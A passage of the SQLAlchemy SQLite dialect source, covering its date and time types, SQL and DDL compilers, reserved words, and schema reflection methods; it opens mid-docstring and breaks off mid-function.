assert [c[0] for c in cursor.description] == ['a', 'b']
cursor.execute('''
select x.a, x.b from x where a=1
union
select x.a, x.b from x where a=2
''')
assert [c[0] for c in cursor.description] == ['a', 'b'], \
[c[0] for c in cursor.description]
The second assertion fails::
Traceback (most recent call last):
File "test.py", line 19, in <module>
[c[0] for c in cursor.description]
AssertionError: ['x.a', 'x.b']
Where above, the driver incorrectly reports the names of the columns
including the name of the table, which is entirely inconsistent vs.
when the UNION is not present.
SQLAlchemy relies upon column names being predictable in how they match
to the original statement, so the SQLAlchemy dialect has no choice but
to filter these out::
from sqlalchemy import create_engine
eng = create_engine("sqlite://")
conn = eng.connect()
conn.exec_driver_sql("create table x (a integer, b integer)")
conn.exec_driver_sql("insert into x (a, b) values (1, 1)")
conn.exec_driver_sql("insert into x (a, b) values (2, 2)")
result = conn.exec_driver_sql("select x.a, x.b from x")
assert result.keys() == ["a", "b"]
result = conn.exec_driver_sql('''
select x.a, x.b from x where a=1
union
select x.a, x.b from x where a=2
''')
assert result.keys() == ["a", "b"]
Note that above, even though SQLAlchemy filters out the dots, *both
names are still addressable*::
>>> row = result.first()
>>> row["a"]
1
>>> row["x.a"]
1
>>> row["b"]
1
>>> row["x.b"]
1
Therefore, the workaround applied by SQLAlchemy only impacts
:meth:`_engine.CursorResult.keys` and :meth:`.Row.keys()` in the public API. In
the very specific case where an application is forced to use column names that
contain dots, and the functionality of :meth:`_engine.CursorResult.keys` and
:meth:`.Row.keys()` is required to return these dotted names unmodified,
the ``sqlite_raw_colnames`` execution option may be provided, either on a
per-:class:`_engine.Connection` basis::
result = conn.execution_options(sqlite_raw_colnames=True).exec_driver_sql('''
select x.a, x.b from x where a=1
union
select x.a, x.b from x where a=2
''')
assert result.keys() == ["x.a", "x.b"]
or on a per-:class:`_engine.Engine` basis::
engine = create_engine("sqlite://", execution_options={"sqlite_raw_colnames": True})
When using the per-:class:`_engine.Engine` execution option, note that
**Core and ORM queries that use UNION may not function properly**.
SQLite-specific table options
-----------------------------
One option for CREATE TABLE is supported directly by the SQLite
dialect in conjunction with the :class:`_schema.Table` construct:
* ``WITHOUT ROWID``::
Table("some_table", metadata, ..., sqlite_with_rowid=False)
.. seealso::
`SQLite CREATE TABLE options
<https://www.sqlite.org/lang_createtable.html>`_
""" # noqa
import datetime
import numbers
import re
from .json import JSON
from .json import JSONIndexType
from .json import JSONPathType
from ... import exc
from ... import schema as sa_schema
from ... import sql
from ... import types as sqltypes
from ... import util
from ...engine import default
from ...engine import processors
from ...engine import reflection
from ...sql import coercions
from ...sql import ColumnElement
from ...sql import compiler
from ...sql import elements
from ...sql import roles
from ...sql import schema
from ...types import BLOB # noqa
from ...types import BOOLEAN # noqa
from ...types import CHAR # noqa
from ...types import DECIMAL # noqa
from ...types import FLOAT # noqa
from ...types import INTEGER # noqa
from ...types import NUMERIC # noqa
from ...types import REAL # noqa
from ...types import SMALLINT # noqa
from ...types import TEXT # noqa
from ...types import TIMESTAMP # noqa
from ...types import VARCHAR # noqa
class _SQliteJson(JSON):
def result_processor(self, dialect, coltype):
default_processor = super(_SQliteJson, self).result_processor(
dialect, coltype
)
def process(value):
try:
return default_processor(value)
except TypeError:
if isinstance(value, numbers.Number):
return value
else:
raise
return process
class _DateTimeMixin:
_reg = None
_storage_format = None
def __init__(self, storage_format=None, regexp=None, **kw):
super(_DateTimeMixin, self).__init__(**kw)
if regexp is not None:
self._reg = re.compile(regexp)
if storage_format is not None:
self._storage_format = storage_format
@property
def format_is_text_affinity(self):
"""return True if the storage format will automatically imply
a TEXT affinity.
If the storage format contains no non-numeric characters,
it will imply a NUMERIC storage format on SQLite; in this case,
the type will generate its DDL as DATE_CHAR, DATETIME_CHAR,
TIME_CHAR.
.. versionadded:: 1.0.0
"""
spec = self._storage_format % {
"year": 0,
"month": 0,
"day": 0,
"hour": 0,
"minute": 0,
"second": 0,
"microsecond": 0,
}
return bool(re.search(r"[^0-9]", spec))
def adapt(self, cls, **kw):
if issubclass(cls, _DateTimeMixin):
if self._storage_format:
kw["storage_format"] = self._storage_format
if self._reg:
kw["regexp"] = self._reg
return super(_DateTimeMixin, self).adapt(cls, **kw)
def literal_processor(self, dialect):
bp = self.bind_processor(dialect)
def process(value):
return "'%s'" % bp(value)
return process
class DATETIME(_DateTimeMixin, sqltypes.DateTime):
r"""Represent a Python datetime object in SQLite using a string.
The default string storage format is::
"%(year)04d-%(month)02d-%(day)02d %(hour)02d:%(minute)02d:%(second)02d.%(microsecond)06d"
e.g.::
2021-03-15 12:05:57.105542
The storage format can be customized to some degree using the
``storage_format`` and ``regexp`` parameters, such as::
import re
from sqlalchemy.dialects.sqlite import DATETIME
dt = DATETIME(storage_format="%(year)04d/%(month)02d/%(day)02d "
"%(hour)02d:%(minute)02d:%(second)02d",
regexp=r"(\d+)/(\d+)/(\d+) (\d+)-(\d+)-(\d+)"
)
:param storage_format: format string which will be applied to the dict
with keys year, month, day, hour, minute, second, and microsecond.
:param regexp: regular expression which will be applied to incoming result
rows. If the regexp contains named groups, the resulting match dict is
applied to the Python datetime() constructor as keyword arguments.
Otherwise, if positional groups are used, the datetime() constructor
is called with positional arguments via
``*map(int, match_obj.groups(0))``.
""" # noqa
_storage_format = (
"%(year)04d-%(month)02d-%(day)02d "
"%(hour)02d:%(minute)02d:%(second)02d.%(microsecond)06d"
)
def __init__(self, *args, **kwargs):
truncate_microseconds = kwargs.pop("truncate_microseconds", False)
super(DATETIME, self).__init__(*args, **kwargs)
if truncate_microseconds:
assert "storage_format" not in kwargs, (
"You can specify only "
"one of truncate_microseconds or storage_format."
)
assert "regexp" not in kwargs, (
"You can specify only one of "
"truncate_microseconds or regexp."
)
self._storage_format = (
"%(year)04d-%(month)02d-%(day)02d "
"%(hour)02d:%(minute)02d:%(second)02d"
)
def bind_processor(self, dialect):
datetime_datetime = datetime.datetime
datetime_date = datetime.date
format_ = self._storage_format
def process(value):
if value is None:
return None
elif isinstance(value, datetime_datetime):
return format_ % {
"year": value.year,
"month": value.month,
"day": value.day,
"hour": value.hour,
"minute": value.minute,
"second": value.second,
"microsecond": value.microsecond,
}
elif isinstance(value, datetime_date):
return format_ % {
"year": value.year,
"month": value.month,
"day": value.day,
"hour": 0,
"minute": 0,
"second": 0,
"microsecond": 0,
}
else:
raise TypeError(
"SQLite DateTime type only accepts Python "
"datetime and date objects as input."
)
return process
def result_processor(self, dialect, coltype):
if self._reg:
return processors.str_to_datetime_processor_factory(
self._reg, datetime.datetime
)
else:
return processors.str_to_datetime
class DATE(_DateTimeMixin, sqltypes.Date):
r"""Represent a Python date object in SQLite using a string.
The default string storage format is::
"%(year)04d-%(month)02d-%(day)02d"
e.g.::
2011-03-15
The storage format can be customized to some degree using the
``storage_format`` and ``regexp`` parameters, such as::
import re
from sqlalchemy.dialects.sqlite import DATE
d = DATE(
storage_format="%(month)02d/%(day)02d/%(year)04d",
regexp=re.compile("(?P<month>\d+)/(?P<day>\d+)/(?P<year>\d+)")
)
:param storage_format: format string which will be applied to the
dict with keys year, month, and day.
:param regexp: regular expression which will be applied to
incoming result rows. If the regexp contains named groups, the
resulting match dict is applied to the Python date() constructor
as keyword arguments. Otherwise, if positional groups are used, the
date() constructor is called with positional arguments via
``*map(int, match_obj.groups(0))``.
"""
_storage_format = "%(year)04d-%(month)02d-%(day)02d"
def bind_processor(self, dialect):
datetime_date = datetime.date
format_ = self._storage_format
def process(value):
if value is None:
return None
elif isinstance(value, datetime_date):
return format_ % {
"year": value.year,
"month": value.month,
"day": value.day,
}
else:
raise TypeError(
"SQLite Date type only accepts Python "
"date objects as input."
)
return process
def result_processor(self, dialect, coltype):
if self._reg:
return processors.str_to_datetime_processor_factory(
self._reg, datetime.date
)
else:
return processors.str_to_date
class TIME(_DateTimeMixin, sqltypes.Time):
r"""Represent a Python time object in SQLite using a string.
The default string storage format is::
"%(hour)02d:%(minute)02d:%(second)02d.%(microsecond)06d"
e.g.::
12:05:57.10558
The storage format can be customized to some degree using the
``storage_format`` and ``regexp`` parameters, such as::
import re
from sqlalchemy.dialects.sqlite import TIME
t = TIME(storage_format="%(hour)02d-%(minute)02d-"
"%(second)02d-%(microsecond)06d",
regexp=re.compile("(\d+)-(\d+)-(\d+)-(?:-(\d+))?")
)
:param storage_format: format string which will be applied to the dict
with keys hour, minute, second, and microsecond.
:param regexp: regular expression which will be applied to incoming result
rows. If the regexp contains named groups, the resulting match dict is
applied to the Python time() constructor as keyword arguments. Otherwise,
if positional groups are used, the time() constructor is called with
positional arguments via ``*map(int, match_obj.groups(0))``.
"""
_storage_format = "%(hour)02d:%(minute)02d:%(second)02d.%(microsecond)06d"
def __init__(self, *args, **kwargs):
truncate_microseconds = kwargs.pop("truncate_microseconds", False)
super(TIME, self).__init__(*args, **kwargs)
if truncate_microseconds:
assert "storage_format" not in kwargs, (
"You can specify only "
"one of truncate_microseconds or storage_format."
)
assert "regexp" not in kwargs, (
"You can specify only one of "
"truncate_microseconds or regexp."
)
self._storage_format = "%(hour)02d:%(minute)02d:%(second)02d"
def bind_processor(self, dialect):
datetime_time = datetime.time
format_ = self._storage_format
def process(value):
if value is None:
return None
elif isinstance(value, datetime_time):
return format_ % {
"hour": value.hour,
"minute": value.minute,
"second": value.second,
"microsecond": value.microsecond,
}
else:
raise TypeError(
"SQLite Time type only accepts Python "
"time objects as input."
)
return process
def result_processor(self, dialect, coltype):
if self._reg:
return processors.str_to_datetime_processor_factory(
self._reg, datetime.time
)
else:
return processors.str_to_time
colspecs = {
sqltypes.Date: DATE,
sqltypes.DateTime: DATETIME,
sqltypes.JSON: _SQliteJson,
sqltypes.JSON.JSONIndexType: JSONIndexType,
sqltypes.JSON.JSONPathType: JSONPathType,
sqltypes.Time: TIME,
}
ischema_names = {
"BIGINT": sqltypes.BIGINT,
"BLOB": sqltypes.BLOB,
"BOOL": sqltypes.BOOLEAN,
"BOOLEAN": sqltypes.BOOLEAN,
"CHAR": sqltypes.CHAR,
"DATE": sqltypes.DATE,
"DATE_CHAR": sqltypes.DATE,
"DATETIME": sqltypes.DATETIME,
"DATETIME_CHAR": sqltypes.DATETIME,
"DOUBLE": sqltypes.DOUBLE,
"DECIMAL": sqltypes.DECIMAL,
"FLOAT": sqltypes.FLOAT,
"INT": sqltypes.INTEGER,
"INTEGER": sqltypes.INTEGER,
"JSON": JSON,
"NUMERIC": sqltypes.NUMERIC,
"REAL": sqltypes.REAL,
"SMALLINT": sqltypes.SMALLINT,
"TEXT": sqltypes.TEXT,
"TIME": sqltypes.TIME,
"TIME_CHAR": sqltypes.TIME,
"TIMESTAMP": sqltypes.TIMESTAMP,
"VARCHAR": sqltypes.VARCHAR,
"NVARCHAR": sqltypes.NVARCHAR,
"NCHAR": sqltypes.NCHAR,
}
class SQLiteCompiler(compiler.SQLCompiler):
extract_map = util.update_copy(
compiler.SQLCompiler.extract_map,
{
"month": "%m",
"day": "%d",
"year": "%Y",
"second": "%S",
"hour": "%H",
"doy": "%j",
"minute": "%M",
"epoch": "%s",
"dow": "%w",
"week": "%W",
},
)
def visit_truediv_binary(self, binary, operator, **kw):
return (
self.process(binary.left, **kw)
+ " / "
+ "(%s + 0.0)" % self.process(binary.right, **kw)
)
def visit_now_func(self, fn, **kw):
return "CURRENT_TIMESTAMP"
def visit_localtimestamp_func(self, func, **kw):
return 'DATETIME(CURRENT_TIMESTAMP, "localtime")'
def visit_true(self, expr, **kw):
return "1"
def visit_false(self, expr, **kw):
return "0"
def visit_char_length_func(self, fn, **kw):
return "length%s" % self.function_argspec(fn)
def visit_cast(self, cast, **kwargs):
if self.dialect.supports_cast:
return super(SQLiteCompiler, self).visit_cast(cast, **kwargs)
else:
return self.process(cast.clause, **kwargs)
def visit_extract(self, extract, **kw):
try:
return "CAST(STRFTIME('%s', %s) AS INTEGER)" % (
self.extract_map[extract.field],
self.process(extract.expr, **kw),
)
except KeyError as err:
raise exc.CompileError(
"%s is not a valid extract argument." % extract.field
) from err
def limit_clause(self, select, **kw):
text = ""
if select._limit_clause is not None:
text += "\n LIMIT " + self.process(select._limit_clause, **kw)
if select._offset_clause is not None:
if select._limit_clause is None:
text += "\n LIMIT " + self.process(sql.literal(-1))
text += " OFFSET " + self.process(select._offset_clause, **kw)
else:
text += " OFFSET " + self.process(sql.literal(0), **kw)
return text
def for_update_clause(self, select, **kw):
# sqlite has no "FOR UPDATE" AFAICT
return ""
def visit_is_distinct_from_binary(self, binary, operator, **kw):
return "%s IS NOT %s" % (
self.process(binary.left),
self.process(binary.right),
)
def visit_is_not_distinct_from_binary(self, binary, operator, **kw):
return "%s IS %s" % (
self.process(binary.left),
self.process(binary.right),
)
def visit_json_getitem_op_binary(self, binary, operator, **kw):
if binary.type._type_affinity is sqltypes.JSON:
expr = "JSON_QUOTE(JSON_EXTRACT(%s, %s))"
else:
expr = "JSON_EXTRACT(%s, %s)"
return expr % (
self.process(binary.left, **kw),
self.process(binary.right, **kw),
)
def visit_json_path_getitem_op_binary(self, binary, operator, **kw):
if binary.type._type_affinity is sqltypes.JSON:
expr = "JSON_QUOTE(JSON_EXTRACT(%s, %s))"
else:
expr = "JSON_EXTRACT(%s, %s)"
return expr % (
self.process(binary.left, **kw),
self.process(binary.right, **kw),
)
def visit_empty_set_op_expr(self, type_, expand_op):
# slightly old SQLite versions don't seem to be able to handle
# the empty set impl
return self.visit_empty_set_expr(type_)
def visit_empty_set_expr(self, element_types):
return "SELECT %s FROM (SELECT %s) WHERE 1!=1" % (
", ".join("1" for type_ in element_types or [INTEGER()]),
", ".join("1" for type_ in element_types or [INTEGER()]),
)
def visit_regexp_match_op_binary(self, binary, operator, **kw):
return self._generate_generic_binary(binary, " REGEXP ", **kw)
def visit_not_regexp_match_op_binary(self, binary, operator, **kw):
return self._generate_generic_binary(binary, " NOT REGEXP ", **kw)
def _on_conflict_target(self, clause, **kw):
if clause.constraint_target is not None:
target_text = "(%s)" % clause.constraint_target
elif clause.inferred_target_elements is not None:
target_text = "(%s)" % ", ".join(
(
self.preparer.quote(c)
if isinstance(c, str)
else self.process(c, include_table=False, use_schema=False)
)
for c in clause.inferred_target_elements
)
if clause.inferred_target_whereclause is not None:
target_text += " WHERE %s" % self.process(
clause.inferred_target_whereclause,
include_table=False,
use_schema=False,
literal_binds=True,
)
else:
target_text = ""
return target_text
def visit_on_conflict_do_nothing(self, on_conflict, **kw):
target_text = self._on_conflict_target(on_conflict, **kw)
if target_text:
return "ON CONFLICT %s DO NOTHING" % target_text
else:
return "ON CONFLICT DO NOTHING"
def visit_on_conflict_do_update(self, on_conflict, **kw):
clause = on_conflict
target_text = self._on_conflict_target(on_conflict, **kw)
action_set_ops = []
set_parameters = dict(clause.update_values_to_set)
# create a list of column assignment clauses as tuples
insert_statement = self.stack[-1]["selectable"]
cols = insert_statement.table.c
for c in cols:
col_key = c.key
if col_key in set_parameters:
value = set_parameters.pop(col_key)
elif c in set_parameters:
value = set_parameters.pop(c)
else:
continue
if coercions._is_literal(value):
value = elements.BindParameter(None, value, type_=c.type)
else:
if (
isinstance(value, elements.BindParameter)
and value.type._isnull
):
value = value._clone()
value.type = c.type
value_text = self.process(value.self_group(), use_schema=False)
key_text = self.preparer.quote(col_key)
action_set_ops.append("%s = %s" % (key_text, value_text))
# check for names that don't match columns
if set_parameters:
util.warn(
"Additional column names not matching "
"any column keys in table '%s': %s"
% (
self.current_executable.table.name,
(", ".join("'%s'" % c for c in set_parameters)),
)
)
for k, v in set_parameters.items():
key_text = (
self.preparer.quote(k)
if isinstance(k, str)
else self.process(k, use_schema=False)
)
value_text = self.process(
coercions.expect(roles.ExpressionElementRole, v),
use_schema=False,
)
action_set_ops.append("%s = %s" % (key_text, value_text))
action_text = ", ".join(action_set_ops)
if clause.update_whereclause is not None:
action_text += " WHERE %s" % self.process(
clause.update_whereclause, include_table=True, use_schema=False
)
return "ON CONFLICT %s DO UPDATE SET %s" % (target_text, action_text)
class SQLiteDDLCompiler(compiler.DDLCompiler):
def get_column_specification(self, column, **kwargs):
coltype = self.dialect.type_compiler.process(
column.type, type_expression=column
)
colspec = self.preparer.format_column(column) + " " + coltype
default = self.get_column_default_string(column)
if default is not None:
if isinstance(column.server_default.arg, ColumnElement):
default = "(" + default + ")"
colspec += " DEFAULT " + default
if not column.nullable:
colspec += " NOT NULL"
on_conflict_clause = column.dialect_options["sqlite"][
"on_conflict_not_null"
]
if on_conflict_clause is not None:
colspec += " ON CONFLICT " + on_conflict_clause
if column.primary_key:
if (
column.autoincrement is True
and len(column.table.primary_key.columns) != 1
):
raise exc.CompileError(
"SQLite does not support autoincrement for "
"composite primary keys"
)
if (
column.table.dialect_options["sqlite"]["autoincrement"]
and len(column.table.primary_key.columns) == 1
and issubclass(column.type._type_affinity, sqltypes.Integer)
and not column.foreign_keys
):
colspec += " PRIMARY KEY"
on_conflict_clause = column.dialect_options["sqlite"][
"on_conflict_primary_key"
]
if on_conflict_clause is not None:
colspec += " ON CONFLICT " + on_conflict_clause
colspec += " AUTOINCREMENT"
if column.computed is not None:
colspec += " " + self.process(column.computed)
return colspec
def visit_primary_key_constraint(self, constraint):
# for columns with sqlite_autoincrement=True,
# the PRIMARY KEY constraint can only be inline
# with the column itself.
if len(constraint.columns) == 1:
c = list(constraint)[0]
if (
c.primary_key
and c.table.dialect_options["sqlite"]["autoincrement"]
and issubclass(c.type._type_affinity, sqltypes.Integer)
and not c.foreign_keys
):
return None
text = super(SQLiteDDLCompiler, self).visit_primary_key_constraint(
constraint
)
on_conflict_clause = constraint.dialect_options["sqlite"][
"on_conflict"
]
if on_conflict_clause is None and len(constraint.columns) == 1:
on_conflict_clause = list(constraint)[0].dialect_options["sqlite"][
"on_conflict_primary_key"
]
if on_conflict_clause is not None:
text += " ON CONFLICT " + on_conflict_clause
return text
def visit_unique_constraint(self, constraint):
text = super(SQLiteDDLCompiler, self).visit_unique_constraint(
constraint
)
on_conflict_clause = constraint.dialect_options["sqlite"][
"on_conflict"
]
if on_conflict_clause is None and len(constraint.columns) == 1:
col1 = list(constraint)[0]
if isinstance(col1, schema.SchemaItem):
on_conflict_clause = list(constraint)[0].dialect_options[
"sqlite"
]["on_conflict_unique"]
if on_conflict_clause is not None:
text += " ON CONFLICT " + on_conflict_clause
return text
def visit_check_constraint(self, constraint):
text = super(SQLiteDDLCompiler, self).visit_check_constraint(
constraint
)
on_conflict_clause = constraint.dialect_options["sqlite"][
"on_conflict"
]
if on_conflict_clause is not None:
text += " ON CONFLICT " + on_conflict_clause
return text
def visit_column_check_constraint(self, constraint):
text = super(SQLiteDDLCompiler, self).visit_column_check_constraint(
constraint
)
if constraint.dialect_options["sqlite"]["on_conflict"] is not None:
raise exc.CompileError(
"SQLite does not support on conflict clause for "
"column check constraint"
)
return text
def visit_foreign_key_constraint(self, constraint):
local_table = constraint.elements[0].parent.table
remote_table = constraint.elements[0].column.table
if local_table.schema != remote_table.schema:
return None
else:
return super(SQLiteDDLCompiler, self).visit_foreign_key_constraint(
constraint
)
def define_constraint_remote_table(self, constraint, table, preparer):
"""Format the remote table clause of a CREATE CONSTRAINT clause."""
return preparer.format_table(table, use_schema=False)
def visit_create_index(
self, create, include_schema=False, include_table_schema=True
):
index = create.element
self._verify_index_table(index)
preparer = self.preparer
text = "CREATE "
if index.unique:
text += "UNIQUE "
text += "INDEX "
if create.if_not_exists:
text += "IF NOT EXISTS "
text += "%s ON %s (%s)" % (
self._prepared_index_name(index, include_schema=True),
preparer.format_table(index.table, use_schema=False),
", ".join(
self.sql_compiler.process(
expr, include_table=False, literal_binds=True
)
for expr in index.expressions
),
)
whereclause = index.dialect_options["sqlite"]["where"]
if whereclause is not None:
where_compiled = self.sql_compiler.process(
whereclause, include_table=False, literal_binds=True
)
text += " WHERE " + where_compiled
return text
def post_create_table(self, table):
if table.dialect_options["sqlite"]["with_rowid"] is False:
return "\n WITHOUT ROWID"
return ""
class SQLiteTypeCompiler(compiler.GenericTypeCompiler):
def visit_large_binary(self, type_, **kw):
return self.visit_BLOB(type_)
def visit_DATETIME(self, type_, **kw):
if (
not isinstance(type_, _DateTimeMixin)
or type_.format_is_text_affinity
):
return super(SQLiteTypeCompiler, self).visit_DATETIME(type_)
else:
return "DATETIME_CHAR"
def visit_DATE(self, type_, **kw):
if (
not isinstance(type_, _DateTimeMixin)
or type_.format_is_text_affinity
):
return super(SQLiteTypeCompiler, self).visit_DATE(type_)
else:
return "DATE_CHAR"
def visit_TIME(self, type_, **kw):
if (
not isinstance(type_, _DateTimeMixin)
or type_.format_is_text_affinity
):
return super(SQLiteTypeCompiler, self).visit_TIME(type_)
else:
return "TIME_CHAR"
def visit_JSON(self, type_, **kw):
# note this name provides NUMERIC affinity, not TEXT.
# should not be an issue unless the JSON value consists of a single
# numeric value. JSONTEXT can be used if this case is required.
return "JSON"
class SQLiteIdentifierPreparer(compiler.IdentifierPreparer):
reserved_words = set(
[
"add",
"after",
"all",
"alter",
"analyze",
"and",
"as",
"asc",
"attach",
"autoincrement",
"before",
"begin",
"between",
"by",
"cascade",
"case",
"cast",
"check",
"collate",
"column",
"commit",
"conflict",
"constraint",
"create",
"cross",
"current_date",
"current_time",
"current_timestamp",
"database",
"default",
"deferrable",
"deferred",
"delete",
"desc",
"detach",
"distinct",
"drop",
"each",
"else",
"end",
"escape",
"except",
"exclusive",
"exists",
"explain",
"false",
"fail",
"for",
"foreign",
"from",
"full",
"glob",
"group",
"having",
"if",
"ignore",
"immediate",
"in",
"index",
"indexed",
"initially",
"inner",
"insert",
"instead",
"intersect",
"into",
"is",
"isnull",
"join",
"key",
"left",
"like",
"limit",
"match",
"natural",
"not",
"notnull",
"null",
"of",
"offset",
"on",
"or",
"order",
"outer",
"plan",
"pragma",
"primary",
"query",
"raise",
"references",
"reindex",
"rename",
"replace",
"restrict",
"right",
"rollback",
"row",
"select",
"set",
"table",
"temp",
"temporary",
"then",
"to",
"transaction",
"trigger",
"true",
"union",
"unique",
"update",
"using",
"vacuum",
"values",
"view",
"virtual",
"when",
"where",
]
)
class SQLiteExecutionContext(default.DefaultExecutionContext):
@util.memoized_property
def _preserve_raw_colnames(self):
return (
not self.dialect._broken_dotted_colnames
or self.execution_options.get("sqlite_raw_colnames", False)
)
def _translate_colname(self, colname):
# TODO: detect SQLite version 3.10.0 or greater;
# see [ticket:3633]
# adjust for dotted column names. SQLite
# in the case of UNION may store col names as
# "tablename.colname", or if using an attached database,
# "database.tablename.colname", in cursor.description
if not self._preserve_raw_colnames and "." in colname:
return colname.split(".")[-1], colname
else:
return colname, None
class SQLiteDialect(default.DefaultDialect):
name = "sqlite"
supports_alter = False
# SQlite supports "DEFAULT VALUES" but *does not* support
# "VALUES (DEFAULT)"
supports_default_values = True
supports_default_metavalue = False
supports_empty_insert = False
supports_cast = True
supports_multivalues_insert = True
tuple_in_values = True
supports_statement_cache = True
default_paramstyle = "qmark"
execution_ctx_cls = SQLiteExecutionContext
statement_compiler = SQLiteCompiler
ddl_compiler = SQLiteDDLCompiler
type_compiler = SQLiteTypeCompiler
preparer = SQLiteIdentifierPreparer
ischema_names = ischema_names
colspecs = colspecs
construct_arguments = [
(
sa_schema.Table,
{
"autoincrement": False,
"with_rowid": True,
},
),
(sa_schema.Index, {"where": None}),
(
sa_schema.Column,
{
"on_conflict_primary_key": None,
"on_conflict_not_null": None,
"on_conflict_unique": None,
},
),
(sa_schema.Constraint, {"on_conflict": None}),
]
_broken_fk_pragma_quotes = False
_broken_dotted_colnames = False
@util.deprecated_params(
_json_serializer=(
"1.3.7",
"The _json_serializer argument to the SQLite dialect has "
"been renamed to the correct name of json_serializer. The old "
"argument name will be removed in a future release.",
),
_json_deserializer=(
"1.3.7",
"The _json_deserializer argument to the SQLite dialect has "
"been renamed to the correct name of json_deserializer. The old "
"argument name will be removed in a future release.",
),
)
def __init__(
self,
native_datetime=False,
json_serializer=None,
json_deserializer=None,
_json_serializer=None,
_json_deserializer=None,
**kwargs,
):
default.DefaultDialect.__init__(self, **kwargs)
if _json_serializer:
json_serializer = _json_serializer
if _json_deserializer:
json_deserializer = _json_deserializer
self._json_serializer = json_serializer
self._json_deserializer = json_deserializer
# this flag used by pysqlite dialect, and perhaps others in the
# future, to indicate the driver is handling date/timestamp
# conversions (and perhaps datetime/time as well on some hypothetical
# driver ?)
self.native_datetime = native_datetime
if self.dbapi is not None:
if self.dbapi.sqlite_version_info < (3, 7, 16):
util.warn(
"SQLite version %s is older than 3.7.16, and will not "
"support right nested joins, as are sometimes used in "
"more complex ORM scenarios. SQLAlchemy 1.4 and above "
"no longer tries to rewrite these joins."
% (self.dbapi.sqlite_version_info,)
)
# NOTE: python 3.7 on fedora for me has SQLite 3.34.1. These
# version checks are getting very stale.
self._broken_dotted_colnames = self.dbapi.sqlite_version_info < (
3,
10,
0,
)
self.supports_default_values = self.dbapi.sqlite_version_info >= (
3,
3,
8,
)
self.supports_cast = self.dbapi.sqlite_version_info >= (3, 2, 3)
self.supports_multivalues_insert = (
# https://www.sqlite.org/releaselog/3_7_11.html
self.dbapi.sqlite_version_info
>= (3, 7, 11)
)
# see https://www.sqlalchemy.org/trac/ticket/2568
# as well as https://www.sqlite.org/src/info/600482d161
self._broken_fk_pragma_quotes = self.dbapi.sqlite_version_info < (
3,
6,
14,
)
_isolation_lookup = util.immutabledict(
{"READ UNCOMMITTED": 1, "SERIALIZABLE": 0}
)
def get_isolation_level_values(self, dbapi_connection):
return list(self._isolation_lookup)
def set_isolation_level(self, dbapi_connection, level):
isolation_level = self._isolation_lookup[level]
cursor = dbapi_connection.cursor()
cursor.execute(f"PRAGMA read_uncommitted = {isolation_level}")
cursor.close()
def get_isolation_level(self, dbapi_connection):
cursor = dbapi_connection.cursor()
cursor.execute("PRAGMA read_uncommitted")
res = cursor.fetchone()
if res:
value = res[0]
else:
# https://www.sqlite.org/changes.html#version_3_3_3
# "Optional READ UNCOMMITTED isolation (instead of the
# default isolation level of SERIALIZABLE) and
# table level locking when database connections
# share a common cache.""
# pre-SQLite 3.3.0 default to 0
value = 0
cursor.close()
if value == 0:
return "SERIALIZABLE"
elif value == 1:
return "READ UNCOMMITTED"
else:
assert False, "Unknown isolation level %s" % value
@reflection.cache
def get_schema_names(self, connection, **kw):
s = "PRAGMA database_list"
dl = connection.exec_driver_sql(s)
return [db[1] for db in dl if db[1] != "temp"]
@reflection.cache
def get_table_names(self, connection, schema=None, **kw):
if schema is not None:
qschema = self.identifier_preparer.quote_identifier(schema)
master = "%s.sqlite_master" % qschema
else:
master = "sqlite_master"
s = ("SELECT name FROM %s " "WHERE type='table' ORDER BY name") % (
master,
)
rs = connection.exec_driver_sql(s)
return [row[0] for row in rs]
@reflection.cache
def get_temp_table_names(self, connection, **kw):
s = (
"SELECT name FROM sqlite_temp_master "
"WHERE type='table' ORDER BY name "
)
rs = connection.exec_driver_sql(s)
return [row[0] for row in rs]
@reflection.cache
def get_temp_view_names(self, connection, **kw):
s = (
"SELECT name FROM sqlite_temp_master "
"WHERE type='view' ORDER BY name "
)
rs = connection.exec_driver_sql(s)
return [row[0] for row in rs]
def has_table(self, connection, table_name, schema=None):
self._ensure_has_table_connection(connection)
info = self._get_table_pragma(
connection, "table_info", table_name, schema=schema
)
return bool(info)
def _get_default_schema_name(self, connection):
return "main"
@reflection.cache
def get_view_names(self, connection, schema=None, **kw):
if schema is not None:
qschema = self.identifier_preparer.quote_identifier(schema)
master = "%s.sqlite_master" % qschema
else:
master = "sqlite_master"
s = ("SELECT name FROM %s " "WHERE type='view' ORDER BY name") % (
master,
)
rs = connection.exec_driver_sql(s)
return [row[0] for row in rs]
@reflection.cache
def get_view_definition(self, connection, view_name, schema=None, **kw):
if schema is not None:
qschema = self.identifier_preparer.quote_identifier(schema)
master = "%s.sqlite_master" % qschema
s = ("SELECT sql FROM %s WHERE name = ? AND type='view'") % (
master,
)
rs = connection.exec_driver_sql(s, (view_name,))
else:
try:
s = (
"SELECT sql FROM "
" (SELECT * FROM sqlite_master UNION ALL "
" SELECT * FROM sqlite_temp_master) "
"WHERE name = ? "
"AND type='view'"
)
rs = connection.exec_driver_sql(s, (view_name,))
except exc.DBAPIError:
s = (
"SELECT sql FROM sqlite_master WHERE name = ? "
"AND type='view'"
)
rs = connection.exec_driver_sql(s, (view_name,))
result = rs.fetchall()
if result:
return result[0].sql
@reflection.cache
def get_columns(self, connection, table_name, schema=None, **kw):
pragma = "table_info"
# computed columns are threaded as hidden, they require table_xinfo
if self.server_version_info >= (3, 31):
pragma = "table_xinfo"
info = self._get_table_pragma(
connection, pragma, table_name, schema=schema
)
columns = []
tablesql = None
for row in info:
name = row[1]
type_ = row[2].upper()
nullable = not row[3]
default = row[4]
primary_key = row[5]
hidden = row[6] if pragma == "table_xinfo" else 0
# hidden has value 0 for normal columns, 1 for hidden columns,
# 2 for computed virtual columns and 3 for computed stored columns
# https://www.sqlite.org/src/info/069351b85f9a706f60d3e98fbc8aaf40c374356b967c0464aede30ead3d9d18b
if hidden == 1:
continue
generated = bool(hidden)
persisted = hidden == 3
if tablesql is None and generated:
tablesql = self._get_table_sql(
connection, table_name, schema, **kw
)
columns.append(
self._get_column_info(
name,
type_,
nullable,
default,
primary_key,
generated,
persisted,
tablesql,
)
)
return columns
def _get_column_info(
self,
name,
type_,
nullable,
default,
primary_key,
generated,
persisted,
tablesql,
):
if generated:
# the type of a column "cc INTEGER GENERATED ALWAYS AS (1 + 42)"
# somehow is "INTEGER GENERATED ALWAYS"
type_ = re.sub("generated", "", type_, flags=re.IGNORECASE)
type_ = re.sub("always", "", type_, flags=re.IGNORECASE).strip()
coltype = self._resolve_type_affinity(type_)
if default is not None:
default = str(default)
colspec = {
"name": name,
"type": coltype,
"nullable": nullable,
"default": default,
"autoincrement": "auto",
"primary_key": primary_key,
}
if generated:
